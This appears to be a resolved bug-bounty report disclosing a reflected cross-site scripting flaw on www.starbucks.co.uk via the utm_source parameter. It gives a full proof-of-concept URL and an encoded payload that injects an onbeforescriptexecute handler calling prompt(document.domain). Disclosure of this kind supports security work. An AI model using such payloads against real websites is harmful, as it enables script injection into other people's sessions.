www.starbucks.co.uk Reflected XSS via utm_source parameter
S
Starbucks
Submitted None
Actions:
Reported by
meals
Vulnerability Details
Technical details and impact analysis
https://www.starbucks.co.uk/shop/card/egift?utm_campaign=egift&utm_content=WinterFY16&utm_medium=GPH&utm_source=SBUXcouk"%3e%3cb%20onbeforescriptexecute=prompt(document.domain)%3e
Payload: "%3e%3cb%20onbeforescriptexecute=prompt(document.domain)%3e
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Generic